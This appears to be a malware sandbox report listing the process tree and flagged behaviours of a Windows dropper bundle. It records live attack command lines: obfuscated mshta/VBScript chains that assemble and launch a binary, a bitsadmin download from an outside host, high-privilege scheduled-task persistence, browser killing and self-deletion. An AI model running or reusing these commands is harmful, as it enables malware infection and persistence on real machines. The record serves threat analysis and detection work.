C:\Users\Admin\AppData\Local\Temp\is-TMI9K.tmp\Sat1481f5a7e3eccdd.tmp"C:\Users\Admin\AppData\Local\Temp\is-TMI9K.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$C0068,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe"C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe" /SILENT7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-L927T.tmp\Sat1481f5a7e3eccdd.tmp"C:\Users\Admin\AppData\Local\Temp\is-L927T.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$10250,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-Q00PB.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-Q00PB.tmp\postback.exe" ss19⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14a7594cc5a0116.exeSat14a7594cc5a0116.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1427fbafcf251.exeSat1427fbafcf251.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1427fbafcf251.exeC:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1427fbafcf251.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14b47e86b9c16b.exeSat14b47e86b9c16b.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat144474a564d26f29.exeSat144474a564d26f29.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\a6a2ZQhj6hMi6OZQH8Nm4nCs.exe"C:\Users\Admin\Pictures\Adobe Films\a6a2ZQhj6hMi6OZQH8Nm4nCs.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\7PeayF9Tb5XcknwhFlZFItg1.exe"C:\Users\Admin\Pictures\Adobe Films\7PeayF9Tb5XcknwhFlZFItg1.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\HQ55SfKidXoRs_jbeqXyDCZL.exe"C:\Users\Admin\Documents\HQ55SfKidXoRs_jbeqXyDCZL.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\y0kMb80z9Fja4FSkWIla18kb.exe"C:\Users\Admin\Pictures\Adobe Films\y0kMb80z9Fja4FSkWIla18kb.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe"C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT( "wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "XgylPHsAOW5QAFuZHh9yeO4V.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\h_tWKtjPYNuVSFdaShBLfLrO.exe"C:\Users\Admin\Pictures\Adobe Films\h_tWKtjPYNuVSFdaShBLfLrO.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6489⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6609⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6649⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6809⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 8969⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 9329⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 10849⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\57052T7m9vPnvaTi49CZopCH.exe"C:\Users\Admin\Pictures\Adobe Films\57052T7m9vPnvaTi49CZopCH.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\BMameXGTyFCpxcZ9otZTnGuy.exe"C:\Users\Admin\Pictures\Adobe Films\BMameXGTyFCpxcZ9otZTnGuy.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\ue41KJ_oVzM77L8GxPePgl1A.exe"C:\Users\Admin\Pictures\Adobe Films\ue41KJ_oVzM77L8GxPePgl1A.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\45McdKh4yEN6rqCKY0ZuGRQk.exe"C:\Users\Admin\Pictures\Adobe Films\45McdKh4yEN6rqCKY0ZuGRQk.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-L1CQ6.tmp\45McdKh4yEN6rqCKY0ZuGRQk.tmp"C:\Users\Admin\AppData\Local\Temp\is-L1CQ6.tmp\45McdKh4yEN6rqCKY0ZuGRQk.tmp" /SL5="$20172,506127,422400,C:\Users\Admin\Pictures\Adobe Films\45McdKh4yEN6rqCKY0ZuGRQk.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-S7N47.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-S7N47.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\CHYTVKIQHN\foldershare.exe"C:\Program Files\Mozilla Firefox\CHYTVKIQHN\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\a6-b9b70-def-72ab6-ecbeb318d062c\Baekefeletu.exe"C:\Users\Admin\AppData\Local\Temp\a6-b9b70-def-72ab6-ecbeb318d062c\Baekefeletu.exe"11⤵
- Checks computer location settings
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 219212⤵
-
C:\Users\Admin\AppData\Local\Temp\d5-2d25c-0d4-cbf86-0e6dafcefba30\Jupikoqezhae.exe"C:\Users\Admin\AppData\Local\Temp\d5-2d25c-0d4-cbf86-0e6dafcefba30\Jupikoqezhae.exe"11⤵
- Drops file in Windows directory
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qzsc4oob.5sm\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\qzsc4oob.5sm\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\qzsc4oob.5sm\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 48814⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 88014⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 92814⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 109214⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uj4zmcxn.0zc\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uj4zmcxn.0zc\installer.exeC:\Users\Admin\AppData\Local\Temp\uj4zmcxn.0zc\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zzig0djb.z31\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\zzig0djb.z31\any.exeC:\Users\Admin\AppData\Local\Temp\zzig0djb.z31\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lcqhoa43.ibg\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\lcqhoa43.ibg\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\lcqhoa43.ibg\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10212 -s 64414⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10212 -s 62014⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c4eak3tt.mjb\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\c4eak3tt.mjb\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\c4eak3tt.mjb\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pcKaq2Eq28KXYPtY -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pIpp1OPsBdTop3OU -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\BtWbiTx\BtWbiTx.dll" BtWbiTx14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\BtWbiTx\BtWbiTx.dll" BtWbiTx15⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\X9CrMOGrOpPKIZqgtV8aNLBI.exe"C:\Users\Admin\Pictures\Adobe Films\X9CrMOGrOpPKIZqgtV8aNLBI.exe"8⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffb789adec0,0x7ffb789aded0,0x7ffb789adee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1472,18203654270738733627,16399146770499251545,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10916_1710923684" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1524 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1472,18203654270738733627,16399146770499251545,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10916_1710923684" --mojo-platform-channel-handle=1820 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\von6J2rHI2UgQky674Td90lo.exe"C:\Users\Admin\Pictures\Adobe Films\von6J2rHI2UgQky674Td90lo.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\_0aRxV7zFs9aNhsV38TcVZ3L.exe"C:\Users\Admin\Pictures\Adobe Films\_0aRxV7zFs9aNhsV38TcVZ3L.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 6567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 6687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 7047⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 7047⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 11247⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\XcYMp2GmVj2G6dzAdKSZf0P2.exe"C:\Users\Admin\Pictures\Adobe Films\XcYMp2GmVj2G6dzAdKSZf0P2.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\B8YkkT0rY7k3CXY_wSzatFSY.exe"C:\Users\Admin\Pictures\Adobe Films\B8YkkT0rY7k3CXY_wSzatFSY.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\B8YkkT0rY7k3CXY_wSzatFSY.exe"C:\Users\Admin\Pictures\Adobe Films\B8YkkT0rY7k3CXY_wSzatFSY.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe"C:\Users\Admin\Pictures\Adobe Films\ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\zcwm5iBuVOBi3eEoRbXV0gY2.exe"C:\Users\Admin\Pictures\Adobe Films\zcwm5iBuVOBi3eEoRbXV0gY2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\zcwm5iBuVOBi3eEoRbXV0gY2.exe"C:\Users\Admin\Pictures\Adobe Films\zcwm5iBuVOBi3eEoRbXV0gY2.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14febbc433.exeSat14febbc433.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 6602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 6722⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 6762⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 8122⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 9082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 8882⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 11122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\462d008ebddd44b5806d5883507d44b0 /t 2852 /p 28481⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\F30D.exeC:\Users\Admin\AppData\Local\Temp\F30D.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\F30D.exeC:\Users\Admin\AppData\Local\Temp\F30D.exe2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\D8BA.exeC:\Users\Admin\AppData\Local\Temp\D8BA.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D8BA.exeC:\Users\Admin\AppData\Local\Temp\D8BA.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\366B.exeC:\Users\Admin\AppData\Local\Temp\366B.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\70E5.exeC:\Users\Admin\AppData\Local\Temp\70E5.exe2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\10DF.exeC:\Users\Admin\AppData\Local\Temp\10DF.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 10DF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10DF.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 10DF.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\3F14.exeC:\Users\Admin\AppData\Local\Temp\3F14.exe2⤵
-
